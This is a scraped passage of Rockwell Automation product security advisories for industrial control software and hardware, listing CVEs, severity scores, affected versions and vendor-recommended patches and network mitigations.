1732E-16CFGM12P5QCWR Apply firmware 3.011 or later.

Update Begin 6.0

 

 

CVE-2020-25066    

 

 

 

 

   PowerFlex 527            

 

 

 

 

 

 

Follow suggested actions above

and, when possible, implement

firewall rules to filter out packets

that contain a negative content

length in the HTTP header.

 

 

 

 

 

 

 

 

End Update Begin 6.0

 

General Security Guidelines

 Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that ICMPv4, TCP, ARP and DNS traffic originating from unauthorized sources is blocked.
  • Ensure that software-based firewalls are running with current rule sets and enforced on individual systems.

Software/PC-based Mitigation Strategies
  • Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk.  Information on using AppLocker with Rockwell Automation® products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Mitigations
Use trusted software, software patches antivirus/antimalware programs and interact only with trusted websites
and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS

 

PN1607 | PN1607 | New Open SSL Vulnerability
Published Date:
October 31, 2022
Last Updated:
October 31, 2022
Products:
FactoryTalk View
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Executive Summary

Rockwell Automation is aware of and currently monitoring the Open SSL vulnerability that was initially announced on Tuesday, October 25th. On Tuesday, November 1st the full vulnerability details were disclosed, and a patch was made available by the vendor. As part of our commitment to transparency and to protecting our customers’ security, we are evaluating all Rockwell products for this third-party vulnerability. If any products are affected by this vulnerability, we will provide an update to this notification. We look forward to working with our customers to satisfy any concerns they may have.

High
PN1601 | PN1601 | Stratix Products Vulnerable to Multiple Vulnerabilities
Published Date:
October 27, 2022
Last Updated:
October 27, 2022
CVE IDs:
CVE-2020-3209, CVE-2020-3200, CVE-2021-1385, CVE-2020-3516, CVE-2021-1446
Products:
Stratix 5400 Industrial Ethernet Switch, Stratix 5800 Switch, Stratix 5410 Ind Distribution Switch
CVSS Scores:
6.8, 7.2, 8.8, 6.5, 7.7, 8.6, 4.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision History
Version 1.0 –October 27,2022

Executive Summary

Rockwell Automation is aware of  multiple vulnerabilities that impact Cisco IOS® XE and Cisco IOS software contained within Stratix® devices. Exploitation of these vulnerabilities could potentially lead to, but are not limited to, a denial-of-service condition and remote code execution.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

  • Stratix 5800 Switches
  • Stratix 5400/5410 Switches

Vulnerability Details

CVE 2020-3229 - Cisco IOS XE Software Web UI Privilege Escalation Vulnerability
CVSS Base Score 8.8/10 (High)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

The administrator GUI lacks correct handing of RBAC, which may allow a malicious user to send modified HTTP requests to the targeted device. If exploited, a read-only remote attacker could potentially execute commands or configuration changes as the administrator user.

CVE 2020-3219 - Cisco IOS XE Software Web UI Command Injection Vulnerability
CVSS Base Score 8.8/10 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Due to insufficient validation of user input, this vulnerability could allow a malicious user to inject custom input into the web UI. If exploited, a remote attacker could potentially execute arbitrary code with administrative privileges on the operating system.

CVE-2021-1446 - Cisco IOS XE Software DNS NAT Protocol Application Layer Gateway Denial-of-Service Vulnerability
CVSS Base Score 8.6/10 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

A vulnerability in the DNS application layer gateway (ALG) functionality used by Network Address Translation (NAT) in Cisco IOS XE software could allow an unauthenticated, remote attacker to cause an affected device to reload.

CVE 2020-3200 - Cisco IOS and IOS XE Software Secure Shell Denial-of-Service Vulnerability
CVSS Base Score 7.7/10 (High)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

A vulnerability in the Secure Shell (SSH) server code of Cisco IOS software and Cisco IOS XE software could allow an authenticated, remote attacker to cause an affected device to reload.

CVE 2020-3211 - Cisco IOS XE Software Web UI Command Injection Vulnerability
CVSS Base Score 7.2/10 (High)
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Due to improper input sanitization, this vulnerability could allow a malicious user with administrative privileges to submit specially crafted input in the web UI. If exploited, a remote attacker could potentially execute arbitrary commands with root privileges on the operating system.

CVE 2020-3218 - Cisco IOS XE Software Web UI Remote Code Execution Vulnerability
CVSS Base Score 7.2/10 (High)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Due to improper validation of user supplied input, a malicious user could potentially create a file on the target device and upload a second malicious file to the device. If exploited, a user could execute arbitrary code with root privileges on the underlying Linux shell.

CVE-2020-3209 - Cisco IOS XE Software Digital Signature Verification Bypass Vulnerability
CVSS Base Score 6.8/10 (Medium)
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

The root cause of this vulnerability is an improper check on the area code that manages the verification of the digital signatures of the system files during the initial boot process. If exploited, a malicious user could potentially install and boot malicious software image or execute unsigned binaries on the targeted device. A malicious user could exploit this vulnerability by loading unsigned software on the affected device.

CVE-2021-1385 - Cisco IOx Application Environment Path Traversal Vulnerability
CVSS Base Score 6.5/10 (Medium)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

A vulnerability in the Cisco IOx application hosting environment of multiple Cisco platforms could allow an authenticated, remote attacker to conduct directory traversal attacks and read and write files on the underlying operating system or host system.

CVE 2020-3516 – Cisco IOS XE Software Web UI Improper Input Validation Vulnerability
CVSS Base Score 4.3/10 (Medium)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

A vulnerability in the web server authentication of Cisco IOS XE Software could allow an authenticated, remote attacker to crash the web server on the device.

Risk Mitigation & User Action

This vulnerability has been addressed in newer versions of the Stratix 5800 switch. Customers are also directed towards the risk mitigations provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Products Affected Vulnerabilities Suggested Actions
Stratix 5800 switches CVE-2020-3209 Update to Stratix 5800 v.17.04.01 or later
CVE 2020-3211
CVE 2020-3218
CVE 2020-3229
CVE 2020-3219
CVE-2020-3516
CVE 2021-1385
CVE-2021-1446
Stratix 5800 switches CVE-2020-3200 Update to v16.12.01 or later
Stratix 5400/5410 switches CVE-2020-3200 Update to v15.2(7)E2 or later

Additionally, please see our Knowledgebase article, QA43240 - Recommended Security Guidelines from Rockwell Automation, for additional recommendations to maintain the security posture of your environment.

References

High
PN1605 | FactoryTalk Alarm and Events Server Vulnerable to Denial-Of-Service Attack
Published Date:
October 27, 2022
Last Updated:
October 16, 2024
CVE IDs:
CVE-2022-38744
Products:
FactoryTalk View SE, Studio 5000 View Designer
CVSS Scores (v3.1):
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

 

Revision History
Revision History
Version 1.0 – October 27, 2022

Executive Summary

Rockwell Automation received a report from Kaspersky Labs regarding one vulnerability in FactoryTalk® Alarms and Events servers. If successfully exploited, these vulnerabilities may result in a denial-of-service condition causing the server to be unavailable.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided.

Affected Products

FactoryTalk Alarms and Events server – All versions

Vulnerability Details

CVE-2022-38744 FactoryTalk Alarm and Events server vulnerable to denial-of-service attack
An unauthenticated attacker with network access to a victim's FactoryTalk service could open a connection, causing the service to fault and become unavailable. The affected port can be used as a server ping port and use messages structured with XML.

CVSS v3.1 Base Score: 7.5/10[MEDIUM]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to set up the secondary mitigation as described below that addresses the associated risk. Customers are also directed towards general risk mitigation strategies provided in QA43240 - Recommended Security Guidelines from Rockwell Automation , in our Knowledgebase.
Vulnerability Suggested Actions
CVE-2022-38744 Customers should set up IPsec to mitigate this issue as detailed in QA46277 - Deploying FactoryTalk Software with IPsec

General Security Guidelines

General security guidelines can be found in QA43240 - Recommended Security Guidelines from Rockwell Automation .

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

 

Critical
PN1606 | PN1606 | Factory Talk VantagePoint Software Broken Access Control and Input Validation Vulnerability
Published Date:
October 07, 2022
Last Updated:
October 07, 2022
CVE IDs:
CVE-2022-3158, CVE-2022-38743
Products:
FactoryTalk Linx OPC UA Connector
CVSS Scores:
9.9
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – October 06,2022

Executive Summary

Rockwell Automation is aware of a broken access control and input validation vulnerability. If exploited, this vulnerability could potentially lead to a high impact on the confidentiality, a low impact on the integrity, and the availability of FactoryTalk® VantagePoint® software.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

FactoryTalk VantagePoint software v. 8.0, 8.10, 8.20, 8.30, 8.31

Vulnerability Details

CVE 2022-38743 FactoryTalk VantagePoint Software Broken Access Control Vulnerability
As a part of our commitment to security, Rockwell Automation performs routine testing and vulnerability scanning to maintain the security posture of products. Due to penetration testing, we discovered a broken access control vulnerability. The FactoryTalk VantagePoint SQLServer account could allow a malicious user with read-only privileges to execute SQL statements in the back-end database.

CVE 2022-38743
CVSS Base Score:  9.9/10 (Critical)
CVSS:3.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE 2022-3158 FactoryTalk VantagePoint Software Input Validation Vulnerability
Additionally, the device lacks input validation when users enter SQL statements to retrieve information from the back-end database. This vulnerability could potentially allow a user with basic user privileges to perform remote code execution on the server.

CVE 2022-3158
CVSS Base Score:  9.9/10 (Critical)
CVSS:3.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are encouraged to apply the following configurable risk mitigations to help reduce the risk associated with this vulnerability. We also recommend customers combine risk mitigations with security best practices to employ a defense in depth approach.
Mitigation A Update to FactoryTalk VantagePoint V8.00/8.10/8.20/8.30/8.31 or later.
BF28452 - Patch: Multiple issues, FactoryTalk VantagePoint 8.00/8.10/8.20/8.30/8.31
Mitigation B If customers are unable to update the firmware, we suggest customers configure the database to follow the least privilege principle.

Additional Links

High
PN1595 | PN1595 | OpenSSL Infinite Loop in Rockwell Automation Products
Published Date:
September 23, 2022
Last Updated:
January 28, 2025
CVE IDs:
CVE-2022-0778
CVSS Scores:
7.5, 4.9
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

 

Revision History
Version 1.2 - 28-Jan-2025, Updated Impacted Products (Stratix 4300)
Version 1.1 – 8-Sept-2022, Updated Suggested Actions

Executive Summary

Rockwell Automation received a report on a new vulnerability within OpenSSL, which is used within some of our products. This vulnerability can lead to a denial-of-service within the affected products if successfully launched by an attacker.

Customers using affected versions of this software are encouraged to evaluate the following mitigations provided and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

  • ThinManager® software (Versions 12.0.0 - 12.0.2, 12.1.0 - 12.1.3)
  • FactoryTalk® Linx Gateway (Version 6.30 and earlier)
  • Factory Talk Linx OPC UA Connector (Version 6.30 and earlier)
  • Factory Talk View (Version 11.00 - Version 13.00)
  • Stratix 4300 (Versions 4.0.1.117 and earlier)

Vulnerability Details

CVE-2022-0778 Open SSL allows for an infinite loop

This vulnerability causes the OpenSSL library to enter an infinite loop when parsing an invalid certificate and can result in a denial-of-service (DoS) to the application. An attacker does not need a verified certificate to exploit this vulnerability because parsing a bad certificate triggers the infinite loop before the verification process is completed.

CVSS v3.1 Base Score: 7.5/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2022-0778 Open SSL allows for an infinite loop (*This CVE score only applies to ThinManager)

This vulnerability causes the OpenSSL library to enter an infinite loop when parsing an invalid certificate and can result in a denial-of-service (DoS) to the application. An attacker does not need a verified certificate to exploit this vulnerability because parsing a bad certificate triggers the infinite loop before the verification process is completed.

Administrator privileges are needed for this attack to be successful on ThinManager Software.

CVSS v3.1 Base Score: 4.9/10[MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Products Affected

Suggested Actions

ThinManager

This issue has been patched.  Customers should follow the patch instructions as follows:
If using v12.0.0-12.0.2 >> Download v12.0.3
If using v12.1.0-12.1.3 >> Download v12.1.4

Factory Talk Linx Gateway

Customers should view BF28103 - Patch: OpenSSL Vulnerability, OPC UA Connector 6.20, 6.21, 6.30 to install the update that mitigates the issue.

Factory Talk Linx OPC UA Connector

Customers should view BF28103 - Everyone Patch: OpenSSL Vulnerability, OPC UA Connector 6.20, 6.21, 6.30 to install the update that mitigates the issue.

Factory Talk View

Customers should view BF28297 - Patch: Open SSL Vulnerability, FactoryTalk View 11.0, 12.0, 13.0 to install the update that mitigates the issue.

Stratix 4300

The issue has been patched. Customers should upgrade to v4.0.2.101

Download Center
 
If an upgrade is not possible or available, customers should consider implementing the following mitigations:
  • Use of Microsoft® AppLocker or other similar allow list applications can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation, and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Additional Links

 

High
PN1604 | PN1604 | ThinManager Software Vulnerable to Arbitrary Code Execution and Denial-Of-Service Attack
Published Date:
September 22, 2022
Last Updated:
September 22, 2022
CVE IDs:
CVE-2022-38742
Products:
ThinManager
CVSS Scores:
8.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision History
Version 1.0 – September 22, 2022 – Initial Version

Executive Summary

A vulnerability was discovered by rgod working with Trend Micro’s Zero Day Initiative and reported to Rockwell Automation.  The vulnerability was discovered in the ThinManager® ThinServer™ software. Successful exploitation of this vulnerability could allow an attacker to make the software unresponsive or execute arbitrary code.

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerabilities, including recommended countermeasures, are listed below.

Affected Products

ThinManager ThinServer software Versions
11.0.0 – 11.0.4
11.1.0 – 11.1.4
11.2.0 – 11.2.5
12.0.0 – 12.0.2
12.1.0 – 12.1.3
13.0.0

Vulnerability Details

CVE 2022-38742 ThinManager ThinServer Heap-Based Overflow

CVSS Base Score: 8.1 /10 (High)
CVSS 3.1 Vector String: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

In affected versions, an attacker can send a specifically crafted TFTP or HTTPS request causing a heap-based buffer overflow that crashes the ThinServer process.  This potentially exposes the server to arbitrary remote code execution.

Risk Mitigation & User Action

Customers are directed towards the risk mitigations provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
CVE-2022-38742 Versions Affected Suggested Actions
11.0.0 – 11.0.4 Update to v11.00.05
11.1.0 – 11.1.4 Update to v11.01.05
11.2.0 – 11.2.5 Update to v11.02.06
12.0.0 – 12.0.2 Update to v12.00.03
12.1.0 – 12.1.3 Update to v12.01.04
13.0.0 Update to v13.00.01

Additional Mitigations

If users are unable to update to the patched version, they should put the following mitigation in place:
  • Block network access to the ThinManager TFTP and HTTPS ports from endpoints other than ThinManager managed thin clients
For additional security best practices, please see our Knowledgebase article,QA43240 - Security Best Practices, to maintain the security posture of your environment.

References

CVE-2022-38742

Critical
PN1603 | PN1603 | KEPServer Enterprise Vulnerable to Remote Code Execution and Denial-of-Service Attack
Published Date:
September 01, 2022
Last Updated:
September 01, 2022
CVE IDs:
CVE-2022-2825, CVE-2022-2848
Products:
Kepserver Enterprise
CVSS Scores:
9.1, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision History
Version 1.0 – September 1, 2022 – Initial Version

Executive Summary

Rockwell Automation was notified by ICS-CERT of vulnerabilities discovered in Kepware® KEPServerEX, which affects the Rockwell Automation KEPServer Enterprise. Successful exploitation of these vulnerabilities could allow an attacker to crash the device or remotely execute arbitrary code.

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details are provided relating to the discovered vulnerabilities, including recommended countermeasures.

Affected Products

KEPServer Enterprise – All versions prior to v13.01.00

Vulnerability Details

CVE 2022-2848 KEPServer Enterprise Heap-Based Overflow
CVSS Base Score: 9.1 /10 (Critical)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Specifically crafted OPC UA messages transmitted to the server could allow an attacker to crash the server and
leak data.

CVE 2022-2825 KEPServer Enterprise Stack-Based Overflow
CVSS Base Score: 9.8 /10 (Critical)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Specifically crafted OPC UA messages transmitted to the server could allow an attacker to crash the server and remotely execute code.

Risk Mitigation & User Action

Vulnerability Suggested Actions
CVE-2022-2848 Customers should update to version 13.01.00 which mitigates these issues
CVE-2022-2825


If a customer is unable to update to the mitigated version, it is suggested that Security Best Practices are followed as outlined in our Knowledgebase article, QA43240 - Security Best Practices.

General Security Guidelines

Medium
PN1598 | PN1598 | CVE 2022-1096 Chromium Type Confusion Vulnerability Impact Multiple Products
Published Date:
August 26, 2022
Last Updated:
August 26, 2022
CVE IDs:
CVE-2022-1096
Products:
Using CCW with PanelView Component Terminals, FactoryTalk Linx Gateway, FactoryTalk View SE, Installing CCW, FactoryTalk Linx / RSLinx Enterprise, PowerFlex 6000, Using CCW with Micro800 Controllers, Using CCW with Component Class Drives
CVSS Scores:
4.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Reference
CVE 2022-1096
Revision History
Revision Number
1.1
Revision History
Version 1.0 – July 12, 2022
Version 1.1 – August 26, 2022 Updated FT View Site Edition Mitigation Instructions

Executive Summary

Rockwell Automation is aware of multiple products that use the Chromium web browser and are affected by CVE 2022-1096, which is a zero day type confusion vulnerability. Exploitation of this vulnerability could potentially lead to a low impact to the availability of the targeted device. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Customers using the products in scope are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products. Additional details relating to the discovered vulnerabilities including recommended countermeasures, are provided.

Affected Products

Product in Scope Vulnerable Component
FactoryTalk® Linx Enterprise software
v6.20, 6.21, and 6.30		 V6.21 CefSharp v73.1.130 (EIPCACT feature)
V6.30 CefSharp v91.1.230 (EIPCACT feature)
v6.20 CefSharp v73.1.130 (Device Config feature)
v6.21 CefSharp v73.1.130 (Device Config feature
v6.30 CefSharp v73.1.130 (Device Config feature
Enhanced HIM (eHIM) for PowerFlex® 6000T drives v1.001
Electron v4.2.12
Connected Components Workbench software v11, 12,13 & 20 Note: Drives Trending 1.00.00 and 2.00.00 uses Connected Components Workbench Cefsharp V81.3.100
FactoryTalk Link Gateway software v6.21 and v6.30  v6.21 CefSharp v73.1.130
 v6.30 CefSharp v91.1.230
FactoryTalk View Site Edition software v.13.0 WebView2 v96.0.1054.43

Vulnerability Details

Rockwell Automation has been made aware of a third-party vulnerability that is present in multiple vendor components, which our products use. Due to the way Rockwell Automation uses the Chromium web browser, exploitation of this vulnerability may cause the vulnerable products to become unavailable temporarily. As a result, we adjusted the CVSS Score to reflect how this vulnerability affects our products.

CVE 2022-1096 Chromium Web Browser Type Confusion Vulnerability
CVSS Base Score: 4.0 /10 (Medium)
CVSS 3.1 Vector String:  CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Risk Mitigation & User Action

Rockwell Automation is in the process of testing and validating the patch and will update this advisory for each product as updated firmware becomes available.

For customers using the FactoryTalk View Site Edition follow the recommended actions to address the vulnerability:
  • Do not use the FactoryTalk View SE web browser control if it is not required for the intended use of the product.
  • Customers utilizing the SE Web Browser can manually download and apply the newer version of WebView2 by using the following directions:
    • Replace the Microsoft® msedgewebview2.exe file that is saved in the C:Program Files (x86)Rockwell SoftwareRSView EnterpriseMicrosoft.WebView2.FixedVersionRuntime by copying and pasting the new version of the software into the folder.
    • DO NOT remove the contents of the folder before pasting the new file.

For customers using the Enhanced HIM (eHIM) for Power Flex 6000T drives follow the recommended actions to address the vulnerability:
  • Update the Microsoft Edge browser to Version 99.0.1150 or later. Additionally, apply the update for eHIM when it becomes available to mitigate the vulnerability.
If applying the mitigations, noted above, is not possible please see our Knowledgebase article, QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

References

Critical
PN1550 | PN1550 | CVE-2021-22681: Authentication Bypass Vulnerability Found in Logix Controllers
Published Date:
July 20, 2022
Last Updated:
July 20, 2022
CVE IDs:
CVE-2021-22681
Products:
SoftLogix5800, 1794 FlexLogix, 1756 ControlLogix, 1769 CompactLogix Controllers, 1769 Compact GuardLogix 5370, 1768 CompactLogix Controllers, 5069 Compact GuardLogix 5380, RSLogix 5000 / Studio 5000 Logix Designer
CVSS Scores:
10.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.4
Revision History
Version 1.0 - February 25, 2021. Initial Release.
Version 1.2 - March 5, 2021. Updated for clarity.
Version 1.3 - May 5, 2021. Mitigations updated – 1783-CSP CIP Security Proxy.
Version 1.4 - July 20, 2022. Rearranged placement of general mitigations

Executive Summary

Researchers found that our Studio 5000 Logix Designer® software may allow a key to be discovered. This key is used to verify Logix controllers are communicating with Rockwell Automation design software. If successfully exploited, this vulnerability could allow an unauthorized application to connect with Logix controllers. To leverage this vulnerability, an unauthorized user would require network access to the controller.

FactoryTalk® Security provides user authentication and authorization for a particular set of actions within RSLogix® 5000 and Studio 5000®. Once the application is authorized to open and connect to the controller within RSLogix 5000 or Studio 5000 this verification mechanism, referenced above, is leveraged to establish the connection to the controller. For customers concerned with user access control and who have deployed FactoryTalk Security, this vulnerability may allow an attacker to bypass the protections provided by FactoryTalk Security.

This vulnerability was independently co-discovered by Lab of Information Systems Security Assurance (Eunseon Jeong, Youngho An, Junyoung Park, Insu Oh, Kangbin Yim) of Soonchunhyang University, Kaspersky, and by Claroty, a cybersecurity technology vendor and partner of Rockwell Automation.

Affected Products

Software:
RSLogix 5000 software v16-20, Studio 5000 Logix Designer v21 and later, and corresponding Logix controllers running these versions.
FactoryTalk Security, part of the FactoryTalk Services Platform, if configured and deployed v2.10 and later.

Controllers:
1768 CompactLogix™
1769 CompactLogix
CompactLogix 5370
CompactLogix 5380
CompactLogix 5480
ControlLogix 5550
ControlLogix® 5560
ControlLogix 5570
ControlLogix 5580
DriveLogix™ 5730
FlexLogix™ 1794-L34
Compact GuardLogix® 5370
Compact GuardLogix 5380
Guardlogix 5560
GuardLogix 5570
GuardLogix 5580
SoftLogix™ 5800

Vulnerability Details

CVE-2021-22681: Private Key Extraction
Studio 5000 Logix Designer uses a key to verify Logix controllers are communicating with Rockwell Automation products. If successfully exploited, this vulnerability could allow a remote, unauthenticated attacker to bypass a verification mechanism and authenticate with Logix controllers. If exploited, this vulnerability could enable an unauthorized third-party tool to make changes to the controller configuration and/or application code.

CVSS v3.1 Base Score: 10.0/CRITICAL
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

For details and further mitigation options, please see the table below.
Product Family and Version Risk Mitigation and Recommended User Actions






ControlLogix 5580 v32 or later.
  • Put the controller mode switch to “Run” mode.
If the above cannot be deployed, the followings mitigations are recommended:
  • Deploy CIP Security for Logix Designer application connections through the front port. CIP Security prevents unauthorized connections when deployed properly.
  • If not using the front port, use a 1756-EN4TR ControlLogix EtherNet/IP™ module and deploy CIP Security. The 1756-EN4TR supports CIP Security, which prevents unauthorized connections when properly deployed.



ControlLogix 5580 v31
  • Put the controller mode switch to “Run” mode.I
If the above cannot be deployed, the following mitigations are recommended:
  • Apply v32 or later and follow mitigations actions outlined above.
  • If unable to apply a newer version, use a 1756-EN4TR ControlLogix EtherNet/IP module and deploy CIP Security. The 1756-EN4TR supports CIP Security, which helps prevent unauthorized connections when properly deployed.
ControlLogix 5570 v31 or later.
  • Put the controller mode switch to “Run” mode.
If the above cannot be deployed, the following mitigations are recommended:
  • Use a 1756-EN4TR ControlLogix EtherNet/IP Module and deploy CIP Security. The 1756-EN4TR supports CIP Security, which helps prevent unauthorized connections when properly deployed.
CompactLogix 5380 v28 or later.
  • Put the controller mode switch to “Run” mode.
If the above cannot be deployed, the following mitigations are
recommended:
  • Install the 1783-CSP CIP Security Proxy to provide secure connection between the engineering workstation and the controller. For more information, please see the 1783-CSP CIP Proxy User Manual (link).
CompactLogix 5370 v20 or later
  • Put the controller mode switch to “Run” mode.
If the above cannot be deployed, the following mitigations are
recommended:
  • Install the 1783-CSP CIP Security Proxy to provide secure connection between the engineering workstation and the controller. For more information, please see the 1783-CSP CIP Proxy User Manual (link).
ControlLogix 5580 v28-v30
ControlLogix 5570 v18 or later
ControlLogix 5560 v16 or later
ControlLogix 5550 v16
GuardLogix 5580 v31 or later
GuardLogix 5570 v20 or later
GuardLogix 5560 v16 or later
1768 CompactLogix v16 or later
1769 CompactLogix v16 or later
CompactLogix 5480 v32 or later
Compact GuardLogix 5370 v28 or later
Compact GuardLogix 5380 v31 or later
FlexLogix 1794-L34 v16
DriveLogix 5370 v16 or later
  • Put the controller mode switch to “Run” mode.
SoftLogix 5800

Detection Strategies:
In addition, customers can continue to use the methods below to detect changes to configuration or application files:
  • Monitor controller change log for any unexpected modifications or anomalous activity.
  • If using v17 or later, utilize the Controller Log feature.
  • If using v20 or later, utilize Change Detection in the Logix Designer Application.
  • If available, use the functionality in FactoryTalk® AssetCentre software to detect changes.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Consult the product documentation for specific features, such as a hardware Mode Switch setting, which may be used to block unauthorized changes, etc.
Social Engineering Mitigation Strategies
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
General Mitigations

Customers using the affected products are directed towards risk mitigation and are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense-in-depth strategy.

Rockwell Automation has determined that this vulnerability cannot be mitigated with a patch. Rockwell Automation encourages customers to implement the mitigation strategies outlined in this disclosure.

A comprehensive defense-in-depth strategy can reduce the risk of this vulnerability. To leverage this vulnerability, an unauthorized user requires network access to the controller. Customers should confirm that they are employing proper networking segmentation and security controls.  Including, but not limited to:
